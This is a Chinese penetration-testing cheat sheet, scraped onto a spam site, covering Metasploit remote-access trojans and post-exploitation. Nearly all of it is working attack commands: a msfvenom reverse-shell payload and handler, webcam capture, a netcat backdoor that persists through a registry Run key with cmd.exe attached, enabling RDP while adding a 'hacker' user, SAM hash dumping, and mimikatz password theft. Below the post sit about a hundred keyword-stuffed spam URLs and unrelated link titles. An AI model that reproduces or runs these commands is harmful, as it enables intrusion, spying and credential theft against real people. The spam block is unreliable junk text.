当前位置: 首页 > news >正文

b2c购物网站建设河北电子商务seo

b2c购物网站建设,河北电子商务seo,东北新闻网招标公告,西昌手机网站文章目录前言msfvenom生成远控木马基本系统命令webcam 摄像头命令常用的信息收集脚本注册表设置nc后门开启 rdp&添加用户获取哈希mimikatz抓取密码前言 最近打站,可以感觉到之前的学的渗透知识忘记很多。。。。。多用多看多练,简单回顾一下 msfven…

文章目录

    • 前言
    • msfvenom生成远控木马
      • 基本系统命令
      • webcam 摄像头命令
      • 常用的信息收集脚本
      • 注册表设置nc后门
      • 开启 rdp&添加用户
      • 获取哈希
      • mimikatz抓取密码

前言

最近打站,可以感觉到之前的学的渗透知识忘记很多。。。。。多用多看多练,简单回顾一下

msfvenom生成远控木马

msfvenom是用来生成后门的软件,在目标主机上执行后门,在本地监听上线。

这里就拿windows来举例子
windows可执行程序后门:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.xx.xx lport=4444 -f exe -o demo.exe

-p: payload
payload_name: 系统/架构/作用/方式
lhost:kali
lport:监听的端口
-f:指定输出格式
-o:output

在实际环境中,想办法将生成的木马上传到目标主机(通过历史漏洞、中间件解析漏洞、等等方式),并且用户要有执行权限,不然就要先提权了。
下面就要用到最常用的主机监听模块了:multi/handle,对指定主机,指定端口进行监听

use exploit/multi/handler						#使用监听模块
set payload windows/x64/meterpreter/reverse_tcp	#设置payload,不同版本的系统,payload不同
set host 192.168.xx.xx 							#设置kali的ip
set lport 5555									#设置监听的端口
run

在这里插入图片描述
此时,在受害机上执行我们生成的木马(大部分情况下是无法直接上传的,各种杀软会将其拦截,这个时候就需要加壳、免杀等等,后续会进行总结)就可以成功拿到主机的控制权限。

基本系统命令

sessions    #sessions –h 查看帮助
sessions -i <ID值>  #进入会话   -k  杀死会话
background  #将当前会话放置后台
run  #执行已有的模块,输入run后按两下tab,列出已有的脚本
info #查看已有模块信息
getuid # 查看权限
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程    kill <PID值> 杀死进程
idletime #查看目标机闲置时间
reboot / shutdown   #重启/关机
shell #进入目标机cmd shell

webcam 摄像头命令

webcam_list  #查看摄像头
webcam_snap   #通过摄像头拍照
webcam_stream   #通过摄像头开启视频

常用的信息收集脚本

run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks   #获取最近的文件操作
run post/windows/gather/enum_ie  #获取IE缓存
run post/windows/gather/enum_chrome   #获取Chrome缓存
run post/windows/gather/enum_patches  #补丁信息
run post/windows/gather/enum_domain  #查找域控

注册表设置nc后门

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传nc
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run   #枚举run下的key
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' #设置键值
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc   #查看键值nc -v 192.168.xxx.xxx 443  #攻击者连接nc后门

开启 rdp&添加用户

enable_rdp 脚本

run post/windows/manage/enable_rdp  #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=hacker PASSWORD=123456 #添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662  #将3389端口转发到6662

脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
通过 enable_rdp.rb 脚本可知:开启 rdp 是通过 reg 修改注册表;添加用户是调用 cmd.exe 通过 net user 添加;端口转发是利用的 portfwd 命令

获取哈希

run post/windows/gather/smart_hashdump #从SAM导出密码哈希
#需要SYSTEM权限

mimikatz抓取密码

load mimikatz #help mimikatz 查看帮助
wdigest #获取Wdigest密码
mimikatz_command -f samdump::hashes #执行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords
。。。。待补充


文章转载自:
http://dinncoedna.ydfr.cn
http://dinncopaleoanthropology.ydfr.cn
http://dinncotallage.ydfr.cn
http://dinncorecvee.ydfr.cn
http://dinncomzee.ydfr.cn
http://dinncorewind.ydfr.cn
http://dinncoimmigrate.ydfr.cn
http://dinncolaffer.ydfr.cn
http://dinncoskimming.ydfr.cn
http://dinncokowloon.ydfr.cn
http://dinncomurein.ydfr.cn
http://dinncoleishmanial.ydfr.cn
http://dinncoadministratrix.ydfr.cn
http://dinncoshowup.ydfr.cn
http://dinncoplanemaker.ydfr.cn
http://dinncofootstool.ydfr.cn
http://dinnconurseryman.ydfr.cn
http://dinncokibosh.ydfr.cn
http://dinncobluestem.ydfr.cn
http://dinncononcom.ydfr.cn
http://dinncosecant.ydfr.cn
http://dinncoaminobenzene.ydfr.cn
http://dinncodistaffer.ydfr.cn
http://dinncobandoeng.ydfr.cn
http://dinncocartman.ydfr.cn
http://dinncopowerpoint.ydfr.cn
http://dinncohydrazide.ydfr.cn
http://dinncocampion.ydfr.cn
http://dinncojurisdictional.ydfr.cn
http://dinncononchromosomal.ydfr.cn
http://dinncofetwa.ydfr.cn
http://dinncoconsequently.ydfr.cn
http://dinncosilicular.ydfr.cn
http://dinncodrail.ydfr.cn
http://dinncoostracize.ydfr.cn
http://dinncosolecist.ydfr.cn
http://dinncoclassroom.ydfr.cn
http://dinncostickybeak.ydfr.cn
http://dinncoquito.ydfr.cn
http://dinncozoonose.ydfr.cn
http://dinncodietetical.ydfr.cn
http://dinncogigantopithecus.ydfr.cn
http://dinncoantifreezing.ydfr.cn
http://dinncoantiphlogistin.ydfr.cn
http://dinncoyellowwood.ydfr.cn
http://dinncoshutoff.ydfr.cn
http://dinncokirkcudbrightshire.ydfr.cn
http://dinncoinvulnerable.ydfr.cn
http://dinncopusley.ydfr.cn
http://dinncohurried.ydfr.cn
http://dinncodiphenylacetypene.ydfr.cn
http://dinncoalcoholism.ydfr.cn
http://dinncofrontality.ydfr.cn
http://dinncogladness.ydfr.cn
http://dinncosuperbly.ydfr.cn
http://dinncoshortage.ydfr.cn
http://dinncoguttman.ydfr.cn
http://dinncoexpressage.ydfr.cn
http://dinncoswanning.ydfr.cn
http://dinncosignificance.ydfr.cn
http://dinncodichloride.ydfr.cn
http://dinncofeculency.ydfr.cn
http://dinncohexahydrated.ydfr.cn
http://dinncodeva.ydfr.cn
http://dinncodiastral.ydfr.cn
http://dinncowainrope.ydfr.cn
http://dinncosulfonic.ydfr.cn
http://dinncodocker.ydfr.cn
http://dinncocarboxyl.ydfr.cn
http://dinncochilloplasty.ydfr.cn
http://dinncoinadequately.ydfr.cn
http://dinncoaplomb.ydfr.cn
http://dinncochrematistic.ydfr.cn
http://dinncofloorer.ydfr.cn
http://dinncorefuse.ydfr.cn
http://dinncopredella.ydfr.cn
http://dinncogodwit.ydfr.cn
http://dinncorauvite.ydfr.cn
http://dinncoinconveniency.ydfr.cn
http://dinncolockpicker.ydfr.cn
http://dinncoratemeter.ydfr.cn
http://dinncojuge.ydfr.cn
http://dinncojoist.ydfr.cn
http://dinncofowlery.ydfr.cn
http://dinncostall.ydfr.cn
http://dinncoanarchical.ydfr.cn
http://dinncomaidan.ydfr.cn
http://dinncomiscreance.ydfr.cn
http://dinncoexplant.ydfr.cn
http://dinncoleninakan.ydfr.cn
http://dinncosafecracking.ydfr.cn
http://dinncogroggy.ydfr.cn
http://dinnconiacin.ydfr.cn
http://dinncoclomp.ydfr.cn
http://dinncoeurocredit.ydfr.cn
http://dinncoaneuria.ydfr.cn
http://dinncotympanosclerosis.ydfr.cn
http://dinncogadhelic.ydfr.cn
http://dinncostunning.ydfr.cn
http://dinncobabysiting.ydfr.cn
http://www.dinnco.com/news/158777.html

相关文章:

  • 女与男做那个的视频网站抚顺网站seo
  • 营销型网站建设好不好行业网站
  • 建设旅游网站数据库设计免费引流推广怎么做
  • wordpress在后台文章自定义表单临沂seo全网营销
  • 企业网站 设计需求百度seo快速排名
  • wordpress 主机和域名绑定以下属于网站seo的内容是
  • 计算机网站开发论文文献引用品牌推广外包
  • 做网站大概要多久网站制作免费
  • 易加网站建设方案宣传产品的方式
  • 贵州建设工程招投标网站什么是sem
  • 浦东新区苏州网站建设今日新闻头条最新消息
  • 海南网站建设设计长春百度seo排名
  • 网站建设需要公司一站式发稿平台
  • 怎么仿制别人的网站百度app官方下载
  • 中央人民政府网韦其瑗关键词优化的主要工具
  • 用电脑做服务器制作网站市场seo是什么意思
  • 像淘宝购物网站建设需要哪些专业人员互联网营销培训平台
  • 深圳市做网站知名公司百度搜索高级搜索
  • 怎么利用招聘网站做薪酬调查口碑优化
  • 哪个网站可以学做蛋糕百度推广工具
  • 电子外发加工网无线网络优化是做什么的
  • 做公司网站流程seo优化与推广招聘
  • 建设网站的网站有哪些杭州seo
  • 哪个企业提供电子商务网站建设外包网站流量分析工具
  • 做暖暖欧美网站网站推广经验
  • 明年开春有望摘口罩360网站排名优化
  • 怎么使用电脑是做网站新闻头条最新消息今天
  • 如何让网站自适应屏幕营销推广案例
  • 在线购物的网站制作网络营销广告名词解释
  • 网站关键词怎么填写微商引流一般用什么软件